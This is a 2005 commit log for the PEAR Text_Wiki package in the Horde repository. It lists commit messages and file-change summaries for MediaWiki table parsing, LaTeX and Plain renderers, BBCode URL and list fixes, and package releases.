Author: bertrand Gugger 
Date:   Sun Aug 14 12:54:28 2005 +0000

    A first implementation, span and row_span to follow ...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193417 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Table.php | 261 ++++++++++++++++++++++++++++++++++++
 1 file changed, 261 insertions(+)
 create mode 100644 Text/Wiki/Parse/Mediawiki/Table.php

http://github.com/horde/horde/commit/7e2dc61febde57fed8b4685a803b2fe62909f80a

-----------------------------------------------------------------------

commit e0e851cb8976d9aec8d0eead6baf1eef720c3751
Author: bertrand Gugger 
Date:   Sun Aug 14 15:27:40 2005 +0000

    Implicit start of row after start of table same, implicit cell after row ...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193433 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Table.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/e0e851cb8976d9aec8d0eead6baf1eef720c3751

-----------------------------------------------------------------------

commit 8f27163cada1eaa015bb487fb9f0f6aca3e0f864
Author: bertrand Gugger 
Date:   Sun Aug 14 16:16:35 2005 +0000

    Fixed the header optional attribute for cells
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193440 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Table.php | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

http://github.com/horde/horde/commit/8f27163cada1eaa015bb487fb9f0f6aca3e0f864

-----------------------------------------------------------------------

commit 31d767b94dac340e1795648f70a96965f2e3a360
Author: bertrand Gugger 
Date:   Mon Aug 15 05:29:41 2005 +0000

    Caption and free format
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193474 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Table.php | 48 ++++++++++++++++++++++---------------
 Text/Wiki/Render/Latex/Table.php    | 20 ++++++++++------
 Text/Wiki/Render/Plain/Table.php    | 44 ++++++++++++++++++++--------------
 Text/Wiki/Render/Xhtml/Table.php    | 19 ++++++++++++---
 4 files changed, 84 insertions(+), 47 deletions(-)

http://github.com/horde/horde/commit/31d767b94dac340e1795648f70a96965f2e3a360

-----------------------------------------------------------------------

commit 7cecf57962dedfa2da8ba9ac8a641214636c1bb7
Author: bertrand Gugger 
Date:   Mon Aug 15 06:15:41 2005 +0000

    Missing rendering rule in Latex and Plain
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193477 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Preformatted.php | 48 +++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Preformatted.php | 48 +++++++++++++++++++++++++++++++++
 2 files changed, 96 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex/Preformatted.php
 create mode 100644 Text/Wiki/Render/Plain/Preformatted.php

http://github.com/horde/horde/commit/7cecf57962dedfa2da8ba9ac8a641214636c1bb7

-----------------------------------------------------------------------

commit 84c326c9425ecbe418fd87ff258e3fbf6cc578c8
Author: bertrand Gugger 
Date:   Mon Aug 15 06:24:06 2005 +0000

    Better use the \caption{...} command
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193479 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Table.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/84c326c9425ecbe418fd87ff258e3fbf6cc578c8

-----------------------------------------------------------------------

commit 48c97fea2ad719800d46055fc36075731af201d2
Author: bertrand Gugger 
Date:   Mon Aug 15 09:50:57 2005 +0000

    Missing rendering rule in Latex and Plain
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193489 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Box.php | 54 ++++++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Box.php | 48 +++++++++++++++++++++++++++++++++++++
 2 files changed, 102 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex/Box.php
 create mode 100644 Text/Wiki/Render/Plain/Box.php

http://github.com/horde/horde/commit/48c97fea2ad719800d46055fc36075731af201d2

-----------------------------------------------------------------------

commit 1545103802ba8276ebbc58fa090917db5e296fc1
Author: bertrand Gugger 
Date:   Mon Aug 15 10:09:06 2005 +0000

    Missing rule in Latex and Plain
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193490 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Subscript.php | 54 ++++++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Subscript.php | 48 ++++++++++++++++++++++++++++++++
 2 files changed, 102 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex/Subscript.php
 create mode 100644 Text/Wiki/Render/Plain/Subscript.php

http://github.com/horde/horde/commit/1545103802ba8276ebbc58fa090917db5e296fc1

-----------------------------------------------------------------------

commit 33367d97cb1f70f68e74e7ecc7dab6fbacd6c04b
Author: bertrand Gugger 
Date:   Mon Aug 15 11:10:38 2005 +0000

    Missing rule in Latex and Plain
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193499 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Specialchar.php | 54 ++++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Specialchar.php | 54 ++++++++++++++++++++++++++++++++++
 2 files changed, 108 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex/Specialchar.php
 create mode 100644 Text/Wiki/Render/Plain/Specialchar.php

http://github.com/horde/horde/commit/33367d97cb1f70f68e74e7ecc7dab6fbacd6c04b

-----------------------------------------------------------------------

commit 960c561284002d372f6b8cda6f375b848a9f996a
Author: bertrand Gugger 
Date:   Mon Aug 15 11:36:55 2005 +0000

    Missing rule in Latex and Plain
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193500 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Titlebar.php | 54 +++++++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Titlebar.php | 54 +++++++++++++++++++++++++++++++++++++
 2 files changed, 108 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex/Titlebar.php
 create mode 100644 Text/Wiki/Render/Plain/Titlebar.php

http://github.com/horde/horde/commit/960c561284002d372f6b8cda6f375b848a9f996a

-----------------------------------------------------------------------

commit ea243904ca469411da57df58d32e96b2256030c4
Author: bertrand Gugger 
Date:   Mon Aug 15 15:27:19 2005 +0000

    Missing rule in Ltax and Plain
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193514 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Page.php | 48 +++++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Page.php | 48 +++++++++++++++++++++++++++++++++++++++++
 2 files changed, 96 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex/Page.php
 create mode 100644 Text/Wiki/Render/Plain/Page.php

http://github.com/horde/horde/commit/ea243904ca469411da57df58d32e96b2256030c4

-----------------------------------------------------------------------

commit 6952ddb1363b9e55e703310e0b5e21a5dac9d76e
Author: bertrand Gugger 
Date:   Mon Aug 15 18:34:53 2005 +0000

    Rowspan, colspan and avoid empty cells
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193533 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Table.php | 30 ++++++++++++++++++++++++------
 1 file changed, 24 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/6952ddb1363b9e55e703310e0b5e21a5dac9d76e

-----------------------------------------------------------------------

commit 1f0705d72c017c83be737e2ad50ee711bebf0bf0
Author: bertrand Gugger 
Date:   Mon Aug 15 18:35:46 2005 +0000

    Emphasis needs Strong
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193534 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/1f0705d72c017c83be737e2ad50ee711bebf0bf0

-----------------------------------------------------------------------

commit 2bcab0fc6abadfaeea2b2270ca4aaad7cd2ff897
Author: bertrand Gugger 
Date:   Mon Aug 15 18:36:44 2005 +0000

    Rowspan and space before free format
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193535 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Table.php | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/2bcab0fc6abadfaeea2b2270ca4aaad7cd2ff897

-----------------------------------------------------------------------

commit f03e88bd493c249697822405b28acf8c900ed70c
Author: bertrand Gugger 
Date:   Mon Aug 15 19:52:41 2005 +0000

    Colspan and rowspan also recognized without quotes
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193539 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Table.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/f03e88bd493c249697822405b28acf8c900ed70c

-----------------------------------------------------------------------

commit be748d1cb857c0a4c92df2c648d87b5b695ba39d
Author: bertrand Gugger 
Date:   Wed Aug 17 09:16:36 2005 +0000

    Missing rile in Latex and Plain
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193730 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Plugin.php | 49 +++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Plugin.php | 49 +++++++++++++++++++++++++++++++++++++++
 2 files changed, 98 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex/Plugin.php
 create mode 100644 Text/Wiki/Render/Plain/Plugin.php

http://github.com/horde/horde/commit/be748d1cb857c0a4c92df2c648d87b5b695ba39d

-----------------------------------------------------------------------

commit 077a20c3b7209d3022c56275cddc3f9a7bef9dd3
Author: bertrand Gugger 
Date:   Thu Aug 25 15:27:38 2005 +0000

    Excluded > from path
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 194383 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Image.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/077a20c3b7209d3022c56275cddc3f9a7bef9dd3

-----------------------------------------------------------------------

commit 5023da34be08095dcb6c82edf2355decbfc74d0b
Author: bertrand Gugger 
Date:   Mon Sep 12 11:34:44 2005 +0000

    Secured links on images, don't accept Wikilinks if disabled
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 195859 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Image.php | 106 ++++++++++++++++++++++++++++----------
 1 file changed, 79 insertions(+), 27 deletions(-)

http://github.com/horde/horde/commit/5023da34be08095dcb6c82edf2355decbfc74d0b

-----------------------------------------------------------------------

commit 1fa82ea343a16437a855cf2ac09b325a349df203
Author: bertrand Gugger 
Date:   Mon Sep 12 14:45:39 2005 +0000

    Completed notes, files and maintainers for the release 1.0.1
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 195880 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 106 +++++++++++++++++++++++++++++++++++++++++++++++++-----------
 1 file changed, 87 insertions(+), 19 deletions(-)

http://github.com/horde/horde/commit/1fa82ea343a16437a855cf2ac09b325a349df203

-----------------------------------------------------------------------

commit 5ac0e8a32d9c57d0cbbdc968a1f2210b0ed1be8e
Author: bertrand Gugger 
Date:   Tue Sep 13 19:59:24 2005 +0000

    Preparing first release of Text_Wiki_BBCode
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 195991 c90b9560-bf6c-de11-be94-00142212c4b1

 packageBBCode.xml | 46 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 packageBBCode.xml

http://github.com/horde/horde/commit/5ac0e8a32d9c57d0cbbdc968a1f2210b0ed1be8e

-----------------------------------------------------------------------

commit cb2974a96e9a1b1fcfb8c8eec0d866a9960563a8
Author: bertrand Gugger 
Date:   Wed Sep 14 07:11:08 2005 +0000

    # is optional for hexadecimal colours
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 196022 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Colortext.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/cb2974a96e9a1b1fcfb8c8eec0d866a9960563a8

-----------------------------------------------------------------------

commit 826f5e9f600c453fa51503b7a8a20c3ffba5dfff
Author: bertrand Gugger 
Date:   Wed Sep 14 07:33:22 2005 +0000

    Output the source of the image
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 196023 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Tiki/Image.php | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/826f5e9f600c453fa51503b7a8a20c3ffba5dfff

-----------------------------------------------------------------------

commit 9a5d779ba01804571268891d85ab45853b8c3814
Author: bertrand Gugger 
Date:   Wed Sep 14 14:29:38 2005 +0000

    Bug #5397 variable used inside single quotes bugs WikiLinks
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 196041 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Wikilink.php | 98 ++++++++++++++++++------------------
 1 file changed, 49 insertions(+), 49 deletions(-)

http://github.com/horde/horde/commit/9a5d779ba01804571268891d85ab45853b8c3814

-----------------------------------------------------------------------

commit f1ccdae4133995f815876591956f3c636b196c77
Author: bertrand Gugger 
Date:   Sun Sep 18 13:39:39 2005 +0000

    Preset $collapse to null, sorry for non Tiki users
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 196293 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Heading.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/f1ccdae4133995f815876591956f3c636b196c77

-----------------------------------------------------------------------

commit 89402083f5f5ee218f8d3e8c28ce2913e02cd903
Author: bertrand Gugger 
Date:   Fri Sep 30 15:20:20 2005 +0000

    Unitiliazed row and column 's spans when coming from bot mediawiki parser
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 197231 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Table.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/89402083f5f5ee218f8d3e8c28ce2913e02cd903

-----------------------------------------------------------------------

commit f9f13d40872b1ee37d537803de0ee68520b5c716
Author: bertrand Gugger 
Date:   Fri Sep 30 20:11:47 2005 +0000

    > is already > , too much gready on the non quoted args
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 197260 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Tiki/Plugin.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/f9f13d40872b1ee37d537803de0ee68520b5c716

-----------------------------------------------------------------------

commit 9321ff991bd460a1e4aeef19680bf91ed0f05170
Author: bertrand Gugger 
Date:   Sat Oct 1 15:47:17 2005 +0000

    Phplookup and Function rules aren't used by Tiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 197297 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Tiki.php | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/9321ff991bd460a1e4aeef19680bf91ed0f05170

-----------------------------------------------------------------------

commit 1abc0533961b6ae1fc383d0d6df389561e82e5f5
Author: bertrand Gugger 
Date:   Sat Oct 1 15:51:22 2005 +0000

    As Plugin may introduce some more markup, raw and preformated had to be done in the same "round"
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 197299 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Tiki/Plugin.php | 28 ++++++++++++++++++++--------
 1 file changed, 20 insertions(+), 8 deletions(-)

http://github.com/horde/horde/commit/1abc0533961b6ae1fc383d0d6df389561e82e5f5

-----------------------------------------------------------------------

commit 531ee852f31f8d98fb5ee56bf83d797e25aca173
Author: bertrand Gugger 
Date:   Sat Oct 1 20:51:11 2005 +0000

    Function and Phplookup rules aren't used by Tiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 197310 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Tiki/Function.php  | 143 -------------------------------------
 Text/Wiki/Parse/Tiki/Phplookup.php |  73 -------------------
 2 files changed, 216 deletions(-)
 delete mode 100755 Text/Wiki/Parse/Tiki/Function.php
 delete mode 100755 Text/Wiki/Parse/Tiki/Phplookup.php

http://github.com/horde/horde/commit/531ee852f31f8d98fb5ee56bf83d797e25aca173

-----------------------------------------------------------------------

commit bf5418b5c0bdc702b15416230b53358439ede1b4
Author: bertrand Gugger 
Date:   Tue Oct 4 08:17:51 2005 +0000

    Documentation
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 197527 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Smiley.php | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/bf5418b5c0bdc702b15416230b53358439ede1b4

-----------------------------------------------------------------------

commit abd549b58c083ead0d67b0de007a8fda30ee4533
Author: bertrand Gugger 
Date:   Tue Oct 4 08:22:31 2005 +0000

    Tiki people may also smile :)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 197528 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Tiki/Smiley.php | 67 +++++++++++++++++++++++++++++++++++++++++
 Text/Wiki/Tiki.php              |  1 +
 2 files changed, 68 insertions(+)
 create mode 100644 Text/Wiki/Parse/Tiki/Smiley.php

http://github.com/horde/horde/commit/abd549b58c083ead0d67b0de007a8fda30ee4533

-----------------------------------------------------------------------

commit 71d03ddba7bf6a7cb56a8de1998268b68f666ed0
Author: Justin Patrin 
Date:   Fri Oct 14 22:25:24 2005 +0000

    Adding Text_Wiki_Tiki package file
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 198461 c90b9560-bf6c-de11-be94-00142212c4b1

 packageTiki.xml | 114 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 114 insertions(+)
 create mode 100644 packageTiki.xml

http://github.com/horde/horde/commit/71d03ddba7bf6a7cb56a8de1998268b68f666ed0

-----------------------------------------------------------------------

commit dcce67dc536ffe2fb97edee100686535873ead5f
Author: Justin Patrin 
Date:   Fri Oct 14 22:27:56 2005 +0000

    Fix summary and description
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 198462 c90b9560-bf6c-de11-be94-00142212c4b1

 packageTiki.xml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/dcce67dc536ffe2fb97edee100686535873ead5f

-----------------------------------------------------------------------

commit 05c400ca433d39f25272273b7a5b9e68ac552020
Author: Justin Patrin 
Date:   Fri Oct 14 23:04:01 2005 +0000

    Adding apckage.xml for Text_Wiki_Doku
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 198468 c90b9560-bf6c-de11-be94-00142212c4b1

 packageDoku.xml | 108 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 108 insertions(+)
 create mode 100644 packageDoku.xml

http://github.com/horde/horde/commit/05c400ca433d39f25272273b7a5b9e68ac552020

-----------------------------------------------------------------------

commit bcdbb44867889a858cdb415a22907ec76524a484
Author: Justin Patrin 
Date:   Fri Oct 14 23:09:31 2005 +0000

    Adding package.xml for Text_Wiki_Cowiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 198471 c90b9560-bf6c-de11-be94-00142212c4b1

 packageCowiki.xml | 108 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 108 insertions(+)
 create mode 100644 packageCowiki.xml

http://github.com/horde/horde/commit/bcdbb44867889a858cdb415a22907ec76524a484

-----------------------------------------------------------------------

commit ce5f94db59075f80dd6a60dc5a8fc82f63e5b9b4
Author: Justin Patrin 
Date:   Sat Oct 15 17:13:34 2005 +0000

    Add toggg as a lead for all 3 new packages (sorry about that toggg)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 198515 c90b9560-bf6c-de11-be94-00142212c4b1

 packageCowiki.xml | 8 +++++++-
 packageDoku.xml   | 8 +++++++-
 packageTiki.xml   | 8 +++++++-
 3 files changed, 21 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/ce5f94db59075f80dd6a60dc5a8fc82f63e5b9b4

-----------------------------------------------------------------------

commit 5760ec194e34960ff1ee97710a19acc966d8f7eb
Author: bertrand Gugger 
Date:   Wed Oct 19 23:43:53 2005 +0000

    Obviously, the # is to be kept in the anchor option, #5660, merci jeremy Lecour
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 198815 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Freelink.php | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/5760ec194e34960ff1ee97710a19acc966d8f7eb

-----------------------------------------------------------------------

commit 2d1f12f0e103284745fbd18da5be69cb3f475032
Author: Firman Wandayandi 
Date:   Tue Oct 25 05:09:15 2005 +0000

    Add superscript and subscript extension
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 199139 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Subscript.php   | 86 ++++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/BBCode/Superscript.php | 85 +++++++++++++++++++++++++++++++++
 2 files changed, 171 insertions(+)
 create mode 100644 Text/Wiki/Parse/BBCode/Subscript.php
 create mode 100644 Text/Wiki/Parse/BBCode/Superscript.php

http://github.com/horde/horde/commit/2d1f12f0e103284745fbd18da5be69cb3f475032

-----------------------------------------------------------------------

commit e78308c89edd26c300e54ce90ebeda61bf5cdc59
Author: Firman Wandayandi 
Date:   Tue Oct 25 05:12:29 2005 +0000

    Turn on Superscript and Subscript rules
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 199140 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/e78308c89edd26c300e54ce90ebeda61bf5cdc59

-----------------------------------------------------------------------

commit 3ad3ddd90e4f3e9ebb073d8e1f3414144a9cef88
Author: Firman Wandayandi 
Date:   Tue Oct 25 05:15:30 2005 +0000

    Request #5767: relative [url] syntax not supported (e.g. [url=/contact.php])
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 199141 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Url.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/3ad3ddd90e4f3e9ebb073d8e1f3414144a9cef88

-----------------------------------------------------------------------

commit aa067c9e597f12e6236d6ae8489810ef915caa47
Author: bertrand Gugger 
Date:   Wed Nov 2 07:21:47 2005 +0000

    onclick in lowercase for Xhtml compliance (Bug #5847)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 199762 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Interwiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/aa067c9e597f12e6236d6ae8489810ef915caa47

-----------------------------------------------------------------------

commit fb58bb137d77d2a9ec11de8b2d5bbb50b33f2176
Author: bertrand Gugger 
Date:   Fri Nov 4 19:58:23 2005 +0000

    Don't mix bullet and numbered lists when following each other
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 199981 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/List.php | 124 +++++++++++++++++++--------------------
 1 file changed, 62 insertions(+), 62 deletions(-)

http://github.com/horde/horde/commit/fb58bb137d77d2a9ec11de8b2d5bbb50b33f2176

-----------------------------------------------------------------------

commit b9c8739ffcf9005bc23bf42a10cd629580a62286
Author: bertrand Gugger 
Date:   Sat Nov 5 16:26:42 2005 +0000

    Ooops ! debug output, sorry
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200031 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/List.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/b9c8739ffcf9005bc23bf42a10cd629580a62286

-----------------------------------------------------------------------

commit 39ef8835f2201f36339e407c0d5ee29bd6379974
Author: bertrand Gugger 
Date:   Sun Nov 6 06:59:02 2005 +0000

    Option relative_enable default false for relative urls (Request #5767)
    Refuse ] , [ and ' in path part of the url, should be urlencoded
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200063 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Url.php | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/39ef8835f2201f36339e407c0d5ee29bd6379974

-----------------------------------------------------------------------

commit c8ee74f2c80bc519283535dc3b96c4730b47aed9
Author: bertrand Gugger 
Date:   Sun Nov 6 08:35:43 2005 +0000

    Added more tests for url, email, lists and xss craps
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200067 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/BBtest.txt | 57 +++++++++++++++++++++++++++++++++++++++++++++++----------
 1 file changed, 47 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/c8ee74f2c80bc519283535dc3b96c4730b47aed9

-----------------------------------------------------------------------

commit ca6602ab620e3d897890005ab6ceebccb8c56aa8
Author: bertrand Gugger 
Date:   Sun Nov 6 08:38:44 2005 +0000

    Prepare release 0.0.2 (alpha), changelog, added firman as lead,
    Include examples showing how to replace deprecated HTML_BBCodeParser by Text_Wiki_BBCode
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200068 c90b9560-bf6c-de11-be94-00142212c4b1

 packageBBCode.xml | 35 +++++++++++++++++++++++++++++++----
 1 file changed, 31 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/ca6602ab620e3d897890005ab6ceebccb8c56aa8

-----------------------------------------------------------------------

commit ead45b730c1eda5ca6198d5debe8fbdfe09a7e64
Author: bertrand Gugger 
Date:   Sun Nov 6 10:38:25 2005 +0000

    Render enumeration type a, A, i, or I
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200073 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/List.php | 36 +++++++++++++++++++++++++++---------
 Text/Wiki/Render/Xhtml/List.php |  8 ++++++--
 2 files changed, 33 insertions(+), 11 deletions(-)

http://github.com/horde/horde/commit/ead45b730c1eda5ca6198d5debe8fbdfe09a7e64

-----------------------------------------------------------------------

commit b01d93e4a710a24d111327e009785f0d51511ce3
Author: bertrand Gugger 
Date:   Sun Nov 6 10:40:31 2005 +0000

    Fixed enumeration type [list=A] (as html type: a,A,i or I)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200074 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/List.php | 16 +++++++++++-----
 packageBBCode.xml               |  3 ++-
 2 files changed, 13 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/b01d93e4a710a24d111327e009785f0d51511ce3

-----------------------------------------------------------------------

commit aa677b5d65e59cb2e544767e17f929f3ba62e60c
Author: bertrand Gugger 
Date:   Sun Nov 6 11:44:11 2005 +0000

    Prepare release 1.0.2 (stable) changelogs and BBCode dependency on this release
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200082 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml       | 75 +++++++++++++++++++++++++++++++++++--------------------
 packageBBCode.xml |  4 +--
 2 files changed, 50 insertions(+), 29 deletions(-)

http://github.com/horde/horde/commit/aa677b5d65e59cb2e544767e17f929f3ba62e60c

-----------------------------------------------------------------------

commit 4d5ec6abc3a4f5c8455be2d0869e26e37beb1010
Author: bertrand Gugger 
Date:   Sun Nov 6 20:44:09 2005 +0000

    Mixed list ends only if the other kind of list starts at first level but may contains sub-lists from the other kind (Bug #5879)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200117 c90b9560-bf6c-de11-be94-00142212c4b1

